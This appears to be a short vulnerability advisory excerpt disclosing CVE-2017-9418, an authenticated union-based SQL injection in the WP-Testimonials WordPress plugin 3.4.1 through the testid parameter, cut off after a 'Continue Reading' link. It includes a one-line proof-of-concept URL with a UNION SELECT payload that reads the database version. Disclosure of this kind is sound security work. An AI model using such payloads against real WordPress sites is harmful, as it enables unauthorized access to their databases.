CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)

Identification Date: 02/06/2017 Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/ Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/   Description SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter. Proof of Concept A Proof of Concept code is provided below. http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL– comment The results of the SQL injection are being reflected in…

Continue Reading